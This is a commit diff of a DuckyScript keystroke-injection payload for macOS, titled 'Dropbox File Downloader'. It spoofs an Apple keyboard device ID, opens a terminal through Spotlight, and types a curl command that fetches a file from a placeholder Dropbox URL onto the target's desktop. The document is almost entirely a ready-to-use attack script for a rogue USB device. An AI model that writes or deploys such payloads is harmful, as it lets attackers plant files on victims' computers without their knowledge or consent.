Dropbox File Downloader.txt

This commit is contained in:
Narsty
2023-06-04 19:18:40 -05:00
committed by GitHub
parent 415cd1dd7c
commit a74661510e
+8 -5
View File
@@ -1,11 +1,14 @@
REM Author: Narsty
REM Title: Dropbox File Downloader
REM Version 1.0 MacOs
REM Replace <dropbox URL> with the actual URL for the file you want to download.
REM Additionally, replace filename with the desired name and extension for the downloaded file.
REM the script will download a file to the target MacOs desktop
REM Author: Narsty
REM Title: Dropbox File Downloader
REM Version 1.0 MacOs
REM Category: Recon
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
@@ -18,4 +21,4 @@ STRING curl -L -o ~/Desktop/<filename> "<Dropbox URL>"
DELAY 500
ENTER
DELAY 5000
ENTER
ENTER